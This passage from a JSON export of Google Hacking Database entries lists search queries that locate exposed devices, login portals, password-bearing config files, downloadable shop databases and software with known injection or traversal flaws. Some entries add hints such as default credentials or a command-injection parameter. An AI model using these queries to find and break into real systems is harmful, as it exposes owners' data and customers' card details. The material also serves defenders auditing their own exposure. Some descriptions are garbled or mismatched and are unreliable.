        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22switch+home+page%22+%22cisco+systems%22+%22Telnet+-+to%22&btnG=Search", 
        "shortDescription": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", 
        "textualDescription": "Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it."
    }, 
    {
        "signatureReferenceNumber": "540", 
        "link": "https://www.exploit-db.com/ghdb/540/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22DEFAULT_CONFIG+-+HP%22&ie=UTF-8&oe=UTF-8", 
        "shortDescription": "intitle:\"DEFAULT_CONFIG - HP\"", 
        "textualDescription": "searches for the web interface of HP switches."
    }, 
    {
        "signatureReferenceNumber": "541", 
        "link": "https://www.exploit-db.com/ghdb/541/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%22Powered+by+yappa-ng%22&hl=en&lr=&filter=0", 
        "shortDescription": "\"Powered by yappa-ng\"", 
        "textualDescription": "yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.http://www.securityfocus.com/bid/11314"
    }, 
    {
        "signatureReferenceNumber": "542", 
        "link": "https://www.exploit-db.com/ghdb/542/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com.ar/search?hl=es&q=%22Active+Webcam+Page%22++inurl%3A8080&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "\"Active Webcam Page\" inurl:8080", 
        "textualDescription": "Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting"
    }, 
    {
        "signatureReferenceNumber": "543", 
        "link": "https://www.exploit-db.com/ghdb/543/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Achangepassword.cgi+-cvs&btnG=Search", 
        "shortDescription": "inurl:changepassword.cgi -cvs", 
        "textualDescription": "Allows a user to change his/her password for authentication to the system.  Script allows for repeated failed attempts making this script vulnerable to brute force."
    }, 
    {
        "signatureReferenceNumber": "544", 
        "link": "https://www.exploit-db.com/ghdb/544/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=filetype%3Aini+inurl%3AflashFXP.ini&btnG=Google-Suche&meta=", 
        "shortDescription": "filetype:ini inurl:flashFXP.ini", 
        "textualDescription": "FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP."
    }, 
    {
        "signatureReferenceNumber": "545", 
        "link": "https://www.exploit-db.com/ghdb/545/", 
        "category": "Sensitive Online Shopping Info", 
        "querystring": "http://www.google.de/search?hl=de&ie=ISO-8859-1&q=inurl%3Ashopdbtest.asp&btnG=Suche&meta=", 
        "shortDescription": "inurl:shopdbtest.asp", 
        "textualDescription": "shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database).   The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect."
    }, 
    {
        "signatureReferenceNumber": "546", 
        "link": "https://www.exploit-db.com/ghdb/546/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=es&q=%22Powered+by+A-CART%22+&meta=", 
        "shortDescription": "\"Powered by A-CART\"", 
        "textualDescription": "A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database.  A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password).  http://www.securityfocus.com/bid/5597 (search SF for more)"
    }, 
    {
        "signatureReferenceNumber": "547", 
        "link": "https://www.exploit-db.com/ghdb/547/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=es&q=%22Online+Store+-+Powered+by+ProductCart%22+&meta=", 
        "shortDescription": "\"Online Store - Powered by ProductCart\"", 
        "textualDescription": "ProductCart is \"an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites\". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)"
    }, 
    {
        "signatureReferenceNumber": "548", 
        "link": "https://www.exploit-db.com/ghdb/548/", 
        "category": "Sensitive Online Shopping Info", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%22More+Info+about+MetaCart+Free%22&btnG=Suche&meta=", 
        "shortDescription": "\"More Info about MetaCart Free\"", 
        "textualDescription": "MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc)."
    }, 
    {
        "signatureReferenceNumber": "549", 
        "link": "https://www.exploit-db.com/ghdb/549/", 
        "category": "Sensitive Online Shopping Info", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Amidicart.mdb&btnG=Google-Suche&meta=", 
        "shortDescription": "inurl:midicart.mdb", 
        "textualDescription": "MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name)."
    }, 
    {
        "signatureReferenceNumber": "550", 
        "link": "https://www.exploit-db.com/ghdb/550/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=camera+linksys+inurl%3Amain.cgi&start=0&start=0&ie=utf-8&oe=utf-8", 
        "shortDescription": "camera linksys inurl:main.cgi", 
        "textualDescription": "Another webcam, Linksys style."
    }, 
    {
        "signatureReferenceNumber": "551", 
        "link": "https://www.exploit-db.com/ghdb/551/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22MailMan+Login%22+++&btnG=Suche&meta=", 
        "shortDescription": "intitle:\"MailMan Login\"", 
        "textualDescription": "MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation.  MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'."
    }, 
    {
        "signatureReferenceNumber": "552", 
        "link": "https://www.exploit-db.com/ghdb/552/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22my+webcamXP+server%21%22+inurl%3A%22%3A8080%22&btnG=Search", 
        "shortDescription": "intitle:\"my webcamXP server!\" inurl:\":8080\"", 
        "textualDescription": "\"my webcamXP server!\"Is there really an explantation needed?"
    }, 
    {
        "signatureReferenceNumber": "553", 
        "link": "https://www.exploit-db.com/ghdb/553/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=20&q=%28inurl%3AwebArch%2FmainFrame.cgi+%29+%7C+%28intitle%3A%22web+image+monitor%22+-htm+-solutions%29", 
        "shortDescription": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", 
        "textualDescription": "The Ricoh Aficio 2035 (fax/scanner) web interface.Attackers may read faxes and can get information like internal ip addresses.cleanup by: yeseins & golfocleanup date: Apr 28, 2005original dork: inurl:webArch/mainFrame.cgi"
    }, 
    {
        "signatureReferenceNumber": "554", 
        "link": "https://www.exploit-db.com/ghdb/554/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+FUDforum%22+&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "\"Powered by FUDforum\"", 
        "textualDescription": "FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems.  http://www.securityfocus.com/bid/5501"
    }, 
    {
        "signatureReferenceNumber": "555", 
        "link": "https://www.exploit-db.com/ghdb/555/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22BosDates+Calendar+System+%22+%22powered+by+BosDates+v3.2+by+BosDev%22&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", 
        "textualDescription": "\"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.\"   There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection."
    }, 
    {
        "signatureReferenceNumber": "556", 
        "link": "https://www.exploit-db.com/ghdb/556/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle:%22Lotus+Domino+Go+Webserver:%22+%22Tuning+your+webserver%22+-site:ibm.com&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", 
        "textualDescription": "Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag"
    }, 
    {
        "signatureReferenceNumber": "557", 
        "link": "https://www.exploit-db.com/ghdb/557/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle:%22Directory+Listing,+Index+of+/*/%22&hl=en&lr=&filter=0", 
        "shortDescription": "intitle:\"Directory Listing, Index of /*/\"", 
        "textualDescription": "Vendor page:\"Einfache HTTP-Server-Software f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr privates Homepage-Hosting oder gro\u00c3\u0192\u00c6\u2019\u00c3\u2026\u00c2\u00b8e Uploads.\"small HTTP server software for private hompage hosting or big uploads."
    }, 
    {
        "signatureReferenceNumber": "558", 
        "link": "https://www.exploit-db.com/ghdb/558/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22error+404%22+%22From+RFC+2068+%22&btnG=Search", 
        "shortDescription": "intitle:\"error 404\" \"From RFC 2068 \"", 
        "textualDescription": "WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach."
    }, 
    {
        "signatureReferenceNumber": "559", 
        "link": "https://www.exploit-db.com/ghdb/559/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Open+WebMail%22+%22Open+WebMail+version+%282.20%7C2.21%7C2.30%29+%22&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", 
        "textualDescription": "\"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail\". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl.   Details  Vulnerable Systems:  * Open Webmail versions 2.20, 2.21 and 2.30  * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below)   The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a \";\", \"|\" or \"( )\" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, \"nobody\" or \"www\", e.g.)."
    }, 
    {
        "signatureReferenceNumber": "560", 
        "link": "https://www.exploit-db.com/ghdb/560/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22EMUMAIL+-+Login%22+%22Powered+by+EMU+Webmail%22+++&btnG=Search", 
        "shortDescription": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", 
        "textualDescription": "The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems:  * EMU Webmail version 5.0  * EMU Webmail version 5.1.0  Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. http://www.securityfocus.com/bid/9861"
    }, 
    {
        "signatureReferenceNumber": "561", 
        "link": "https://www.exploit-db.com/ghdb/561/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22WebJeff+-+FileManager%22+intext%3A%22login%22+intext%3APass%7CPAsse&btnG=Search", 
        "shortDescription": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", 
        "textualDescription": "WebJeff-Filemanager 1.x  DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files.  The problem is that the \"index.php3\" file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995"
    }, 
    {
        "signatureReferenceNumber": "562", 
        "link": "https://www.exploit-db.com/ghdb/562/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&q=inurl%3Anetw_tcp.shtml&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "inurl:netw_tcp.shtml", 
        "textualDescription": "An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]"
    }, 
    {
        "signatureReferenceNumber": "563", 
        "link": "https://www.exploit-db.com/ghdb/563/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Object+not+found%21%22+intext%3A%22Apache%2F2.0.*+%28Linux%2FSuSE%29%22&btnG=B%FAsqueda&meta=", 
        "shortDescription": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", 
        "textualDescription": "This one detects apache werbservers (2.0.X/SuSE) with its error page."
    }, 
    {
        "signatureReferenceNumber": "564", 
        "link": "https://www.exploit-db.com/ghdb/564/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3A%22messageboard%2FForum.asp%3F%22&btnG=Search", 
        "shortDescription": "inurl:\"messageboard/Forum.asp?\"", 
        "textualDescription": "Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. http://www.securityfocus.com/bid/11361"
    }, 
    {
        "signatureReferenceNumber": "565", 
        "link": "https://www.exploit-db.com/ghdb/565/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=intitle:%22Directory+Listing%22+%22tree+view%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0", 
        "shortDescription": "intitle:\"Directory Listing\" \"tree view\"", 
        "textualDescription": "Dirlist is an ASP script that list folders in an explorer style:   * Tree  * Detailed  * Tiled   Quote:  *Lists files and directories in either a Tree, Detailed, or Tiled view.  *Can set a \"Starting Directory\". This can be a IIS Virtual Directory path.  *Displays file and directory properties.  *Can specify directories which you do not want to display and access.  *Can specify directories which you only want to display and access.  *Can specify what file-types to only display.  *Displays custom file-type icons. This can be turned off in the settings.  * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings."
    }, 
    {
        "signatureReferenceNumber": "566", 
        "link": "https://www.exploit-db.com/ghdb/566/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Adefault.asp+intitle%3A%22WebCommander%22+&btnG=Search", 
        "shortDescription": "inurl:default.asp intitle:\"WebCommander\"", 
        "textualDescription": "Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings."
    }, 
    {
        "signatureReferenceNumber": "567", 
        "link": "https://www.exploit-db.com/ghdb/567/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&client=firefox-a&q=intitle%3A%22Philex+0.2*%22+-script+-site%3Afreelists.org&btnG=Search", 
        "shortDescription": "intitle:\"Philex 0.2*\" -script -site:freelists.org", 
        "textualDescription": "Philex (phile 'file' explorer) is a web content manager based php   what philex can do ?  - easy navigation with tree structure  - create, delete, rename, copy and move folders/files.  - download files (normal or compressed :zip, gz, bz ).  - download many files as one compressed file.  - send files by email.  - upload local files to server"
    }, 
    {
        "signatureReferenceNumber": "568", 
        "link": "https://www.exploit-db.com/ghdb/568/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=intitle:mywebftp+%22Please+enter+your+password%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0", 
        "shortDescription": "intitle:mywebftp \"Please enter your password\"", 
        "textualDescription": "MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable."
    }, 
    {
        "signatureReferenceNumber": "569", 
        "link": "https://www.exploit-db.com/ghdb/569/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=%221999-2004+FuseTalk+Inc%22+-site%3Afusetalk.com&btnG=Search", 
        "shortDescription": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", 
        "textualDescription": "Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript."
    }, 
    {
        "signatureReferenceNumber": "570", 
        "link": "https://www.exploit-db.com/ghdb/570/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%222003+DUware+All+Rights+Reserved%22&hl=en&lr=&filter=0", 
        "shortDescription": "\"2003 DUware All Rights Reserved\"", 
        "textualDescription": "Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account.   DUclassmate may allow unauthorized remote attackers to gain access to a computer.   DUclassified is reported prone to multiple SQL injection vulnerabilities.   SQL injection issues also affect DUforum.   DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities."
    }, 
    {
        "signatureReferenceNumber": "571", 
        "link": "https://www.exploit-db.com/ghdb/571/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&q=%22WebExplorer+Server+-+Login%22+%22Welcome+to+WebExplorer+Server%22&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", 
        "textualDescription": "WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people."
    }, 
    {
        "signatureReferenceNumber": "572", 
        "link": "https://www.exploit-db.com/ghdb/572/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22ASP+Stats+Generator+*.*%22+%22ASP+Stats+Generator%22+%222003-2004+weppos%22&btnG=B%FAsqueda&meta=", 
        "shortDescription": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", 
        "textualDescription": "ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site."
    }, 
    {
        "signatureReferenceNumber": "573", 
        "link": "https://www.exploit-db.com/ghdb/573/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Installed+Objects+Scanner%22+inurl%3Adefault.asp++&btnG=Search", 
        "shortDescription": "\"Installed Objects Scanner\" inurl:default.asp", 
        "textualDescription": "Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components.   Just place the script on your server and view it in your browser to check your server for all currently known components."
    }, 
    {
        "signatureReferenceNumber": "574", 
        "link": "https://www.exploit-db.com/ghdb/574/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=%0Aintitle%3A%22remote+assessment%22+OpenAanval+Console", 
        "shortDescription": "intitle:\"remote assessment\" OpenAanval Console", 
        "textualDescription": "The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management."
    }, 
    {
        "signatureReferenceNumber": "575", 
        "link": "https://www.exploit-db.com/ghdb/575/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=ext%3Aini+intext%3Aenv.ini&btnG=Search", 
        "shortDescription": "ext:ini intext:env.ini", 
        "textualDescription": "This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more."
    }, 
    {
        "signatureReferenceNumber": "576", 
        "link": "https://www.exploit-db.com/ghdb/576/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=ezBOO+%22%3E%3E+Administrator+Panel+%3C%3C%22+-cvs&hl=en&lr=&start=10&sa=N", 
        "shortDescription": "ezBOO \"Administrator Panel\" -cvs", 
        "textualDescription": "ezBOO WebStats is a high level statistical tool for web sites monitoring.  It allows real time access monitoring on several sites.  Based on php and mySQL it is easy to install and customization is made easy.  It works on Unix, Linux and Windows"
    }, 
    {
        "signatureReferenceNumber": "577", 
        "link": "https://www.exploit-db.com/ghdb/577/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&q=%22This+page+has+been+automatically+generated+by+Plesk+Server+Administrator%22&btnG=B%C3%BAsqueda&meta=", 
        "shortDescription": "\"This page has been automatically generated by Plesk Server Administrator\"", 
        "textualDescription": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.   Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code.   This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username.  http://www.securityfocus.com/bid/3737"
    }, 
    {
        "signatureReferenceNumber": "578", 
        "link": "https://www.exploit-db.com/ghdb/578/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?q=%22The+script+whose+uid+is+%22+%22is+not+allowed+to+access%22&btnG=Search&hl=en&lr=&client=firefox-a", 
        "shortDescription": "\"The script whose uid is \" \"is not allowed to access\"", 
        "textualDescription": "This PHP error message is revealing the webserver's directory and user ID."
    }, 
    {
        "signatureReferenceNumber": "579", 
        "link": "https://www.exploit-db.com/ghdb/579/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Aphp+inurl%3Anqt+intext%3A%22Network+Query+Tool%22+&btnG=Search", 
        "shortDescription": "filetype:php inurl:nqt intext:\"Network Query Tool\"", 
        "textualDescription": "Network Query Tool enables any Internet user to scan network information using:* Resolve/Reverse Lookup* Get DNS Records* Whois (Web)* Whois (IP owner)* Check port (!!!)* Ping host* Traceroute to host* Do it allThe author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of  anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason."
    }, 
    {
        "signatureReferenceNumber": "580", 
        "link": "https://www.exploit-db.com/ghdb/580/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=inurl%3ATiVoConnect%3FCommand%3DQueryServer", 
        "shortDescription": "inurl:TiVoConnect?Command=QueryServer", 
        "textualDescription": "Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms)."
    }, 
    {
        "signatureReferenceNumber": "581", 
        "link": "https://www.exploit-db.com/ghdb/581/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=ext%3Amdb+inurl%3A*.mdb++inurl%3Afpdb+shop", 
        "shortDescription": "ext:mdb inurl:*.mdb  inurl:fpdb shop.mdb", 
        "textualDescription": "The directory \"http:/xxx/fpdb/\" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used \"shop.mdb\" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases."
    }, 
    {
        "signatureReferenceNumber": "582", 
        "link": "https://www.exploit-db.com/ghdb/582/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3Acgi-bin%2Ftestcgi.exe+%22Please+distribute+TestCGI%22", 
        "shortDescription": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", 
        "textualDescription": "Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path."
    }, 
    {
        "signatureReferenceNumber": "583", 
        "link": "https://www.exploit-db.com/ghdb/583/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl:ttt-webmaster.php&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", 
        "shortDescription": "inurl:ttt-webmaster.php", 
        "textualDescription": "Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.Vulnerability report: http://www.securityfocus.com/bid/11358Vendor site: http://www.turbotraffictrader.com/php"
    }, 
    {
        "signatureReferenceNumber": "584", 
        "link": "https://www.exploit-db.com/ghdb/584/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22DVR+Web+client%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0", 
        "shortDescription": "intitle:\"DVR Web client\"", 
        "textualDescription": "This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.* Four Channel Input* Horizontal Resolution 480 Lines* 16.7 Million Color Output* Display In Quad or Single Image (Full MultiPlex)* Motion Detection* Scheduling* Zoom in Live and Playback* 720H X 480V (Full) 360H X 240V In Quad* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)* Web Interface TCP/IP With Client Software* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc."
    }, 
    {
        "signatureReferenceNumber": "585", 
        "link": "https://www.exploit-db.com/ghdb/585/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=intitle:%22ASP+FileMan%22+Resend+-site:iisworks.com&num=100&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&filter=0", 
        "shortDescription": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", 
        "textualDescription": "FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=passIn the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.Site admins have been notified. As always: DO NOT ABUSE THIS."
    }, 
    {
        "signatureReferenceNumber": "586", 
        "link": "https://www.exploit-db.com/ghdb/586/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22index.of+*%22+admin+news.asp+configview.asp&btnG=Search", 
        "shortDescription": "intitle:\"index.of *\" admin news.asp configview.asp", 
